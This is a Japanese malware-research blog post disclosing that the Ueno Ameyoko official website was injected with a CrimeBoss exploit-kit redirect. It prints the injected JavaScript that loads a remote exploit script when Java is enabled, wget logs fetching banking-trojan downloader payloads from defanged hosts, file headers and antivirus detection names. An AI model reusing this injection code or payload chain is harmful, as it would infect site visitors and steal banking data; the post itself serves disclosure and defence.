上野アメ横公式ホームページに「CrimeBoss(マルウェア感染ツール)」のマルウェア感染 リダイレクションコードのコードを発見しました。 証拠は下記となりますが、コードを早めに削除して下さい。 それとウェブサイトのログイン情報を変更し、サーバの脆弱性を直してお願いします。----上記外にあるマルウェアjavascriptを実行されます、そのjavascriptは↓ //ダウンロード証拠
--2013-01-28 19:36:16-- hxxp://abrahamspath,org.uk/cb.php Resolving abrahamspath.org.uk... seconds 0.00, 50.87.25.110 Caching abrahamspath.org.uk => 50.87.25.110 Connecting to abrahamspath.org.uk|50.87.25.110|:80... seconds 0.00, connected. : GET /cb.php HTTP/1.0 Host: abrahamspath.org.uk : HTTP request sent, awaiting response... : HTTP/1.1 200 OK Date: Mon, 28 Jan 2013 10:36:17 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=i9h9an5p471b2epoqdtru42ha7; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Length: unspecified [text/html] Saving to: `cb.php'// 中身のコードは↓↑マークされたURLは「CrimeBossのExploitKit感染URL」 現在海外には流行っているマルウェア感染ツール、リファレンス→ [クリック] さて、このURLをJavaがインストールされているPCでアクセスしたら302が出て、 ユーザが下記のURLへ飛ばされて↓
boyssuitsonline、com/jex/index.php?setup=dそして、下記の別のjavascriptが実行されます…、ので、if(navigator.javaEnabled()) { document.write('<sc' + 'ri' + 'pt src= "h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 + (Math.random()*999999 + 1)) + '" type="text/javascript" charset="iso-8859-1"> </sc' + 'ri' + 'pt>'); }ここでexploit-kitのマルウェア感染javascriptが実行されてしまいます。 テキストのコードはこちた→[PASTEBIN] ←備考:感染不可能な環境! そして下記のURLに保存されたマルウェアファイルがダウンロード↓hxxxp://patuamusic,com,br/app/rh・exe確認したら未だ感染可能な状況ですね↓--2013-01-28 20:23:51-- hxxp://patuamusic.com,br/app/rh・exe;exe Resolving patuamusic.com.br... seconds 0.00, 187・108.192.54 Caching patuamusic.com.br => 187・108.192.54 Connecting to patuamusic.com.br|187・108.192.54|:80... seconds 0.00, connected. GET /app/rh.exe;exe HTTP/1.0 Referer: http://ameyoko.net/index.html Host: patuamusic.com.br Connection: Keep-Alive Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 : HTTP request sent, awaiting response. HTTP/1.0 200 OK Date: Mon, 28 Jan 2013 11:27:28 GMTさっきちゃんとダウンロードしましたの証拠は↓情報↓
Packer : BobSoft Mini Delphi -> BoB / BobSoft 作った日付け : 2013-01-24 14:09:50 感染ターゲットマシン : 0x14C (Intel 386) Entry point address : 0x00057724 MIMEType : application/octet-stream Subsystem : Windows GUI MachineType : Intel 386 or later, and compatibles TimeStamp : 2013:01:24 14:09:50+00:00 FileType : Win32 EXE PEType : PE32 CodeSize : 351744 LinkerVersion : 2.25 EntryPoint : 0x57724 InitializedDataSize : 59392 SubsystemVersion : 4.0 ImageVersion : 0.0 OSVersion : 4.0HEX↓0010 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................ 0040 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 ........!..L.!.. 0050 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 This program mus 0060 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 t be run under W 0070 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 in32..$7........ 0080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ : :短くにすると、ダウンロードされたファイルはトロイダウンローダーです。 銀行/BANKING個人情報を盗む物ですね。 ウイルストータルに確認したら検知率はこんな感じで↓MD5: 87f4774038f4ba4a119cd35e523681b3 File size: 402.5 KB ( 412160 bytes ) File name: rh.exe File type: Win32 EXE Tags: peexe bobsoft Detection ratio: 23 / 46 Analysis date: 2013-01-25 10:42:19 UTC ( 3 日 ago ) URL: https://www.virustotal.com/file/f7551a236daa63dcf02847037fe680b4f5edc8494b30ebe0ae01cb9420b4c194/analysis/ マルウェア名↓ MicroWorld-eScan : Gen:Variant.Graftor.50132 Malwarebytes : Trojan.Inject.DF ESET-NOD32 : a variant of Win32/Injector.RRV TrendMicro-HouseCall : TROJ_GEN.R4AZ4AO Avast : Win32:Malware-gen Kaspersky : Trojan.Win32.Jorik.Vobfus.gkyo BitDefender : Gen:Variant.Graftor.50132 Comodo : UnclassifiedMalware F-Secure : Gen:Variant.Graftor.50132 DrWeb : Win32.HLLW.Autoruner1.30735 VIPRE : Trojan.Win32.Generic!BT AntiVir : TR/Delf.Inject.412160.4 TrendMicro : TROJ_GEN.R4AZ4AO McAfee-GW-Edition : Heuristic.LooksLike.Win32.Suspicious.I Sophos : Mal/Behav-058 Jiangmin : Trojan/Jorik.jday Kingsoft : Win32.Troj.Jorik.gk.(kcloud) Microsoft : VirTool:Win32/DelfInject.gen!X GData : Gen:Variant.Graftor.50132 VBA32 : suspected of Trojan-Dropper.Agent.109 Ikarus : Virus.Win32.DelfInject Fortinet : W32/Injector.fam!tr Panda : W32/Vobfus.GEP.wormこのマルウェアが実行されたら下記のダウンロードが始まります↓METHOD : TCP HTTP/1.1 TYPE: GET URL: hxxp://sonhodoseu・dominiotemporario.com/fugi/Instal.teaz IP:PORT: 187.17.98.153:80 UA: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)ともかく、ダウンロードしました↓--2013-01-28 19:44:10-- hxxp://sonhodoseu.dominiotemporario・com/fugi/Instal.teaz Resolving sonhodoseu,dominiotemporario.com... seconds 0.00, 187・17.98.153 Caching sonhodoseu,dominiotemporario.com => 187,17.98.153 Connecting to sonhodoseu,dominiotemporario.com|187,17.98・153|:80... seconds 0.00, connected. GET /fugi/Instal.teaz HTTP/1.0 Host: sonhodoseu,dominiotemporario.com : HTTP request sent, awaiting response... HTTP/1.1 200 OK Date: Mon, 28 Jan 2013 10:44:11 GMT Content-Type: text/plain Content-Length: 1155072 Connection: keep-alive Keep-Alive: timeout=15 Server: Apache Last-Modified: Sat, 26 Jan 2013 15:17:14 GMT ETag: "c1d8051-11a000-4d43289e85280" Accept-Ranges: bytes 200 OK Registered socket 1896 for persistent reuse. Length: 1155072 (1.1M) [text/plain] Saving to: `Instal.teaz' 2013-01-28 19:44:41 (38.4 KB/s) - `Instal.teaz' saved [1155072/1155072]また別のマルウェアが保存されます。 ファイル名は「Instal.teaz」ですけどPEファイルですね。 例えファイル名がInstal.exeにしたら見た目は下記のように↓情報↓
Packer : BobSoft Mini Delphi -> BoB / BobSoft 作った日付け : 1992-06-19 22:22:17 感染ターゲットマシン : 0x14C (Intel 386) Entry point address : 0x000E7CC0 MIMEType : application/octet-stream Subsystem : Windows GUI MachineType : Intel 386 or later, and compatibles TimeStamp : 1992:06:19 23:22:17+01:00 FileType : Win32 EXE PEType : PE32 CodeSize : 945664 LinkerVersion : 2.25 EntryPoint : 0xe7cc0 InitializedDataSize : 208384 SubsystemVersion : 4.0 ImageVersion : 0.0 OSVersion : 4.0Hex:0000 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP............. 0010 B8 00 00 00 00 00 00 00 40 00 1A 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ................ 0040 BA 10 00 0E 1F B4 09 CD 21 B8 01 4C CD 21 90 90 ........!..L.!.. 0050 54 68 69 73 20 70 72 6F 67 72 61 6D 20 6D 75 73 This program mus 0060 74 20 62 65 20 72 75 6E 20 75 6E 64 65 72 20 57 t be run under W 0070 69 6E 33 32 0D 0A 24 37 00 00 00 00 00 00 00 00 in32..$7........ : :本件のマルウェアはbankingトロイで、 持っている機能はダウンローダー、スパイウェア、ナックドアーですね。 ウイルストータルに確認しましたら下記の情報が出ます↓MD5: b8c677f803acd15dff5bae284083c8a0 File size: 1.1 MB ( 1155072 bytes ) File name: Instal.exe File type: Win32 EXE Detection ratio: 26 / 46 Analysis date: 2013-01-28 11:54:01 UTC ( 0 分 ago ) URL: https://www.virustotal.com/file/9a2a326e99b47c7f2a0bdfb97ffa1068f80dca65a42caa1d84ee65ff8212d3d0/analysis/1359374041/ マルウェア名↓ MicroWorld-eScan : Gen:Variant.Graftor.54880 McAfee : Artemis!B8C677F803AC Malwarebytes : Trojan.Banker Symantec : Trojan.Gen Norman : Troj_Generic.HAOJY ESET-NOD32 : a variant of Win32/Spy.Banker.YVN TrendMicro-HouseCall : TROJ_GEN.R47H1AR Avast : Win32:Malware-gen eSafe : Win32.Trojan Kaspersky : Trojan-Downloader.Win32.Banload.ccft BitDefender : Gen:Variant.Graftor.54880 Comodo : UnclassifiedMalware F-Secure : Gen:Variant.Graftor.54880 DrWeb : Trojan.PWS.Banker1.8451 VIPRE : Trojan.Win32.Generic!BT AntiVir : TR/Spy.Banker.XX McAfee-GW-Edition : Artemis!B8C677F803AC Emsisoft : Gen:Trojan.Heur.DP.gHW@a4WDOkjO (B) GData : Gen:Variant.Graftor.54880 AhnLab-V3 : Downloader/Win32.Banload PCTools : Trojan.Gen Rising : Suspicious Ikarus : Trojan-Banker.Win32.Banker Fortinet : W32/Banload.CCFT!tr.dldr AVG : Downloader.Banload.CHSZ Panda : Trj/CI.A
ゼロデイ・ジャパン
http://0day.jp
マルウェア研究所
アドリアン・ヘンドリック
Tweet
0 件のコメント:
コメントを投稿